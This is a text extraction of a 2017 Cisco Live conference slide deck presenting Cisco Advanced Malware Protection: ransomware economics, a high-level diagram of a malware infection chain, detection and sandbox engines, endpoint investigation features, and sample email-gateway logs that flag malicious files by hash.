advanced malware protection - safeplus live berlin 2017/brkse… · advanced malware protection...
TRANSCRIPT
Advanced Malware Protection
Cisco Advanced Malware Protection [AMP] is designed toprovide both defense and insight Before, During, and After thesebreach attempts. If you have struggled with point of exposure, orthe extent of breach, this session will show how Cisco AMPhelps to detect infections, understand scope, and initiateremediation for protected systems no matter where they are atany moment.
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Me …
Ivan BERLINSON
CISCO Advanced Threat Solutions
Southern Europe Security Engineer
Based in France
BRKSEC-2139 3
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
DOES IT
PROTRECT THEIR CREDIT CARD
ACCOUNT?
Yes No
BRKSEC-2139 4
• Some facts about Malware
• How AMP helps with Malware Prevention
• Prevention alone is not enough – Go further with Detection and Remediation
• How AMP works (Demonstration)
• Q&A
Today we will talk about
• AMP Setup and Threat Grid integration
• BRKSEC-2809 AMP Threat Grid integrations with Web, Email and Endpoint Security
• LTRSEC-2200 Practicing Breach Detection and Mitigation with Cisco Advanced Security Portfolio (AMP, CTA, TG...)
• CTA Details
• BRKSEC-2444 CTA - Detecting advanced malware with machine learning
Today we will NOT talk about
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Permanent Innovation makes Prevention a Non Ending Game
1. Cyber Criminal Organizations are like IT companies
2. Security companies innovate Every Day to Protect youBetter
3. Cyber Criminals innovate Every Day to Breach youBetter
BRKSEC-2139 8
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
And thanks to Financial efficiency, hackers can innovate every day
- Locky’s victims per day* : 90,000 - Average ransom : .5 BTC < > 1 BTC
- Ransom Paid** : 2.9% of victims
1,093,590 $
/ DAY
32,807,700 $
/ MONTH
393,892,400 $
/ YEAR
*Forbes **TALOS Angler Exposer Research
V1 .locky V2 .zepto V3 .odinDridex
20162015
BRKSEC-2139 9
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Like multiple obfuscation hiding malicious behavior from Point in Time protection systems
Receipt_123412
.doc
XOR encoded
Payload
Base64 encoded
payload
Packed PE32
VBA
Launches
Explorer.exe
Unpacked and Executed
by WinWord
DLL
Dropped
UAC BypassKill & Disable
Services
Information
Stealing
Encrypt C&C
communication RC4
Drop & Execute
Dridex Payload
Launches
Calc.exe
DLL
Dropped
Encrypt Regular
Files
Leave How-To decrypt
instructionsDisabling System Recovery /
Backup deletion
Self-Propagation /
Lateral Movement
BRKSEC-2139 10
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
And if Phase 1 is a success, then add new functions for more benefits
Receipt_123412
.doc
XOR encoded
Payload
Base64 encoded
payload
Packed PE32
VBA
Launches
Explorer.exe
Unpacked and Executed
by WinWord
DLL
Dropped
UAC BypassKill & Disable
Services
Information
Stealing
Encrypt C&C
communication RC4
Drop & Execute
Dridex Payload
Launches
Calc.exe
DLL
Dropped
Encrypt Regular
Files
Leave How-To decrypt
instructionsDisabling System Recovery /
Backup deletion
Self-Propagation /
Lateral Movement
BRKSEC-2139 11
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Malware is getting in. Prevention tools ALONE will never catch everything
Initial Disposition = Clean Actual Disposition = Bad
Too Late!!
Blind to
scope of
compromise
AV
IPS
<65%AV Efficacy
Rate
Sleep Techniques
Unknown Protocols
Encryption
Polymorphism
Analysis Stops
Init
ial In
sp
ecti
on
BRKSEC-2139 12
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
HostWebEmailNetwork Attached Controls
Advanced Malware Protection - Unified By Threat
ISRNGIPS NGFW Meraki MX ESA CES WSA CWS Endpoint
AMP Cloud
File
Metadata
BRKSEC-2139 14
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
1-to-1 Signatures
• SHA-256
• Cloud-Enabled Coverage
• Full Signature Database Protection
Data
Data
Feature Vectors
Machine
Learning
Algorithm
Predictive
Model
Decision
Trees
Hypothesis
Disposition Featureprint
LabelsPerformance
Monitoring
Clean
Unknown
Malware
Custome
r
Data
Spero Engine*
Ethos Engine**
• Generic Signature Engine
• Polymorphic variants of a threat
• Machine Learning
• Makes Predictions based on
Applications Features
*Network and Endpoint Only
**Endpoint Only
For YourReference
BRKSEC-2139 15
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
HostWebEmailNetwork Attached Controls
ISRNGIPS NGFW Meraki MX ESA CES WSA CWS Endpoint
TI Database
Static & Dymanic
Analysis
Threat Grid
AMP Cloud
File
Metadata
Threat Score
Advanced Malware Protection - Unified By Threat
BRKSEC-2139 16
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Dynamic Analysis Engine – Cisco Threat Grid
• Unified Malware Analysis And TIP
• Proprietary Static And Dynamic Analysis,
• Human Readable Behavior Indicators
• Samples Correlated With Billions Of Artifacts
• Global / Historical Context On Threat Landscape
• Threat Intelligence Feeds
BRKSEC-2139 17
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
HostWebEmailNetwork Attached Controls
ISRNGIPS NGFW Meraki MX ESA CES WSA CWS Endpoint
TI Database
Static & Dymanic
Analysis
Threat Grid
AMP Cloud
File
Metadata
Threat Score
Advanced Malware Protection - Unified By Threat
BRKSEC-2139 18
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Retrospective Engine
File Reputation Query
Response Disposition
Retrospective Queue
Last 7 days / Every
Hour
Changed Disposition
Retrospective Query (20mn)
SHA, SPERO, ETHOS,
DFC
Real Time
AMP
Threat Grid
BRKSEC-2139 19
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
HostWebEmailNetwork Attached Controls
ISRNGIPS NGFW Meraki MX ESA CES WSA CWS Endpoint
TI Database
Static & Dymanic
Analysis
Threat Grid
AMP Cloud
Cognitive
Threat Analytics
ISE
OpenDNS
Umbrella
File
Metadata
Threat Score
Advanced Malware Protection - Unified By Threat
BRKSEC-2139 20
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
RET Report December 2016 Total Detections
75%
35%
75%
36%
57%
33%
63%
32%
-
1,000,000.00
2,000,000.00
3,000,000.00
4,000,000.00
5,000,000.00
6,000,000.00
Total ThreatGrid Talos Third Party Others
December 2016
Total 5 322 833
Threat Grid 110 289
Talos 1 299 961
Third Party 3 834 207
Others 78 376
For YourReference
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
• Block by AMP File Reputation
• Block by AMP Dynamic File Analysis
• Detect by AMP Retrospection.
Demonstration AMP on ESA
BRKSEC-2139 23
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Endpoint Detection and Response (EDR)
• Detect security incidents
• Contain the incident at the endpoint, such that network traffic or process execution can be remotely controlled
• Investigate security incidents
• Remediate endpoints.
http://blogs.cisco.com/security/endpoint-protection-platform-epp-vs-endpoint-detection-response-edr
Continuous Monitoring and Event Recording
Visibility and Remote Control on Endpoint
BRKSEC-2139 25
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
To investigate a Breach, you need to answer Urgent Questions.
Indications of Compromise to detect/block the Breach (100+) :
• Vulnerability Assessment
• Behavioral Analysis
• Reputation Check
• Low Prevalence
• Dynamic Analysis
• Command Line Capture
• Tetra AV Engine
Adobe Reader / Word / Powerpoint / Excel
/ QuickTime / Java etc. Compromise
Threat
ExecutedThreat
Quarantined
Potentia
l
Dropper
Pwrshell Downloaded
Executable
Possible Ransomware Shadow Copy
Deletion
Netsh Firewall
Disable
Is there a Breach and
What Happened ?
More Than 100 Behaviors Monitored !
BRKSEC-2139 26
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Is there a Breach and
What Happened ?
Device Flow Correlation [DFC]
Timestamp
DeviceIP/Port/Protocol
DestinationIP/Port/Protocol
URLs / Domains
File downloads
• Cisco provided
Intelligence
• Custom–defined lists
• Real Time
Alerts or Blocks / Terminate Process
Cognitive threat Analytics [CTA]
Cisco WSA, Cisco CWS and Bluecoat logs processing
To investigate a Breach, you need to answer Urgent Questions.
BRKSEC-2139 27
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Is there a Breach and
What Happened ?
Where Did The Malware Come
From and Where has it been
To investigate a Breach, you need to answer Urgent Questions.
BRKSEC-2139 28
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Is there a Breach and
What Happened ?
Where Did The Malware Come
From and Where has it been
To investigate a Breach, you need to answer Urgent Questions.
BRKSEC-2139 29
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Is there a Breach and
What Happened ?
Where Did The Malware Come
From and Where has it been
What Is It
Doing?
To investigate a Breach, you need to answer Urgent Questions.
BRKSEC-2139 30
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Is there a Breach and
What Happened ?
Where Did The Malware Come
From and Where has it been
What Is It
Doing?
To investigate a Breach, you need to answer Urgent Questions.
BRKSEC-2139 31
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
And you need to Remediate
Is there a Breach and
What Happened ?
Where Did The Malware Come
From and Where has it been
What Is It
Doing?How Do We
Stop It?
Granular Remediation and remote control
• Simple Hash Block
• Advanced Signature (Clamav)
• Application Blocking
• Network Communication Blocking
• Host Isolation
• Network/Vlan isolation
• Host/User privilege revocation
BRKSEC-2139 32
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
AMP on Endpoints
Malicious Behaviors detected on an Endpoint
Investigation and Remediation
BRKSEC-2139 34
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Complete Your Online Session Evaluation
Don’t forget: Cisco Live sessions will be available for viewing on-demand after the event at CiscoLive.com/Online
• Please complete your Online Session Evaluations after each session
• Complete 4 Session Evaluations & the Overall Conference Evaluation (available from Thursday) to receive your Cisco Live T-shirt
• All surveys can be completed via the Cisco Live Mobile App or the Communication Stations
BRKSEC-2139 36
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Continue Your Education
• Lunch & Learn
• Meet the Engineer 1:1 meetings
• BRKSEC-2809 AMP Threat Grid integrations with Web, Email and Endpoint Security
• LTRSEC-2200 Practicing Breach Detection and Mitigation with Cisco Advanced Security Portfolio (AMP, CTA, TG...)
• BRKSEC-2444 Detecting advanced malware with machine learning
BRKSEC-2139 37
Thank You
“Logic will get you from point A to B,
Imagination will take you Everywhere”
- Albert Einstein
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
• Block by AMP File Reputation
• Block by AMP Dynamic File Analysis
• Detect by AMP Retrospection.
Demonstration AMP on ESA
BRKSEC-2139 41
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
• Tue Feb 14 12:26:07 2017 Info: Response received for file reputation query from Cloud. File Name = 'neup.exe', MID = 423, Disposition = FILE UNKNOWN, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497…., upload_action = 1
• Tue Feb 14 12:26:16 2017 Info: File uploaded for analysis. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, file name: neup.exe
• Tue Feb 14 12:36:31 2017 Info: File Analysis complete. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, File name: neup.exe, Disposition: 3 Score: 95, Spyname:[W32.E05774DA61-95.SBX.TG]
• Tue Feb 14 12:36:31 2017 Info: Response received for file reputation query from Cache. File Name = 'neup.exe', MID = 423, Disposition = MALICIOUS, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497…., upload_action = 2
• Tue Feb 14 13:52:03 2017 Info: Retrospective verdict received. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.E05774DA61-95.SBX.TG
BRKSEC-2139 53
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
• Tue Feb 14 10:42:07 2017 Info: Response received for file reputation query from Cloud. File Name = spoolup8.exe, MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a…, upload_action = 1
• Tue Feb 14 10:42:10 2017 Info: File uploaded for analysis. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, file name: spoolup8.exe
• Tue Feb 14 10:51:32 2017 Info: File Analysis complete. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, File name: spoolup8.exe, Disposition: 1 Score: 56,
• Tue Feb 14 10:51:32 2017 Info: Response received for file reputation query from Cache. File Name = 'spoolup8.exe', MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a…., upload_action = 2
• Tue Feb 14 12:52:02 2017 Info: Retrospective verdict received. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a….., Timestamp: 1487073121.71, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.94D523DC03-73.SBX.VIOC
BRKSEC-2139 56
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
AMP on Endpoints
Malicious Behaviors detected on an Endpoint
Investigation and Remediation
BRKSEC-2139 57